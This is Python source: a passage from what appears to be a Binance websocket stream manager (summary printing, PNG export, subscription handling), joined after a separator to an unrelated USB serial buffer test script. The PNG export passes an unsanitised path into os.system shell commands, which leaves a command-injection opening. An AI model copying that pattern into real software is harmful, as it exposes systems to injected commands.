print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
"===============================================================================================\r\n")
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
:param disable_print: set to `True` to use curses instead of print()
:type disable_print: bool
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
try:
print_text = (
str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | most | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
"===============================================================================================\r\n"
)
if disable_print:
if sys.platform.startswith('Windows'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
:param hight_per_row: set the hight per row for the image hight calculation
:type hight_per_row: int
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ansi excape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10):
"""
Replace a stream
If you want to start a stream with a new config, its recommended, to first start a new stream with the new
settings and close the old stream not before the new stream received its first data. So your data will stay
consistent.
:param stream_id: id of the old stream
:type stream_id: uuid
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:return: new stream_id
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:return: new_stream_id or 'False'
"""
# starting a new socket and stop the old stream not before the new stream received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
def run(self):
"""
This method overloads `threading.run()` and starts management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks)
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams)
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
Is going to be the default user_address, once the websocket is created with this default value, its not possible
to change it. If you plan to use different user_address its recommended to not use this method! Just provide the
user_address with create_stream() in the market parameter.
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logging.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: uuid
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
Set how much received_last_second entries are stored till they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: uuid
"""
self.restart_requests[stream_id] = {'status': "new"}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
Sending more than 8000 chars via websocket.send() leads to a connection loss, 350 list elements is a good limit
to keep the payload length under 8000 chars and avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
:param max_items_per_request: max size for params, if more it gets splitted
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items > max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread, args=(host, port, warn_on_update))
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logging.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
# send signal to all threads
self.stop_manager_request = True
# delete listenKeys
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logging.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream can not heal itself in cause of wrong parameter (wrong market, channel type) it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logging.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report with this call their shutdowns
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logging.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logging.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def unsubscribe_from_stream(self, stream_id, channels=[], markets=[]):
"""
Unsubscribe channels and/or markets to an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
usbtest_rw_buf.py | #!/usr/bin/env python
import logging
import threading
import time
from usblib import device_from_fd
from usblib import shell_usbdevice
from usblib import CP210xSerial
LOGGER = logging.getLogger(__name__)
# ----------------------------------------------------------------------------
def main(fd, debug=False):
device = device_from_fd(fd)
if debug:
shell_usbdevice(fd, device)
print("\n", "#" * 40, "\n")
print(device)
assert device.idVendor == 0x10C4 and device.idProduct == 0xEA60
ser = CP210xSerial(device, baudRate=115200)
try:
# mainly for baud rate
ser.open(_async=True)
# just poll read forever
# ser.read_dump_forever()
# testing ------
buf_test(ser)
finally:
ser.close()
def buf_test(ser):
stop = False
def writer(delay):
i = 0
abc = "abcdefghijklmnopqrstuvwxyz"
while not stop:
ch = abc[i % len(abc)]
nl = "\n" if i % 10 == 0 else " "
data = "{}={}{}".format(ch, i, nl).encode("ascii")
i += 1
ser._buf_in.write(data)
time.sleep(delay)
print("write stopped")
def dumper():
delay = 400.0 / 1000.0
chunk_size = 100
while not stop:
if not ser._buf_in:
print("wait ...")
with ser._buf_in.changed:
notified = ser._buf_in.changed.wait(delay)
print(" notify:", notified)
data = ser._buf_in.read(chunk_size)
if not data:
print(" no data")
continue
text = "".join(chr(v) for v in data)
print(" data:", text, end="\n", flush=True)
print("read stopped")
def buf_reads(delay, chunk_size, timeout):
while not stop:
if not ser._buf_in:
with ser._buf_in.changed:
notified = ser._buf_in.changed.wait(200 / 1000.0)
data = ser.read(chunk_size, timeout)
print(
"read({}, {}): len:{}, data:{}".format(
chunk_size, timeout, len(data), bytes(data)
)
)
time.sleep(delay)
print("read stopped")
def buf_read_util(delay, expected, chunk_size, timeout):
while not stop:
if not ser._buf_in:
with ser._buf_in.changed:
notified = ser._buf_in.changed.wait(200 / 1000.0)
data = ser.read_until(expected, chunk_size, timeout)
print(
"read_until({}, {}, {}): len:{}, data:{}".format(
expected, chunk_size, timeout, len(data), bytes(data)
)
)
time.sleep(delay)
print("read stopped")
def buf_read_util2(delay, expected, chunk_size, timeout):
while not stop:
if not ser._buf_in:
with ser._buf_in.changed:
notified = ser._buf_in.changed.wait(200 / 1000.0)
data = ser.read_until_or_none(expected, chunk_size, timeout)
if data is None:
print(
"read_until({}, {}, {}): {}".format(
expected, chunk_size, timeout, data
)
)
else:
print(
"read_until({}, {}, {}): len:{}, data:{}".format(
expected, chunk_size, timeout, len(data), bytes(data)
)
)
time.sleep(delay)
print("read stopped")
# dump all, shows locking+notificationd
tr = threading.Thread(target=dumper)
# buf reads, no-block
# tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 100, 0))
# buf reads, block, hangs on Stop ...
# tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 25, None))
# buf reads, timeout 3 sec, 25 chars
# tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, 25, 3000.0 / 1000.0))
# buf reads, timeout 3 sec, any char len, mostly empty?
# tr = threading.Thread(target=buf_reads, args=(10.0 / 1000.0, None, 3000.0 / 1000.0))
# until char \n, 3 sec, any size
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", None, 3000.0 / 1000.0))
# until char \n, block, any size
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", None, None))
# until char \n, block, 17 chars
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", 17, None))
# until char \n, no-block, 17 chars
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"\n", 17, 0))
# until no char, 4 sec, 17 chars - always returns
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"", 17, 4000.0 / 1000.0))
# until char "0\n", 4 sec, 17 chars
# tr = threading.Thread(target=buf_read_util, args=(10.0 / 1000.0, b"0\n", 17, 4000.0 / 1000.0))
# until char \n or none, 3 sec, any size
# tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, 3000.0 / 1000.0))
# until char \n or none, no-block, 17 chars - will always return if too
# much data and immediate
# tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", 17, 0))
# until char \n or none, 3 sec, 33 chars,
# fast return if size limit reached
# tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", 33, 3000.0 / 1000.0))
# until char \n or none, no-block, any size
# fast return with None but sometimes result
# tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, 0))
# until char \n or none, block, any size
# block until result or forever
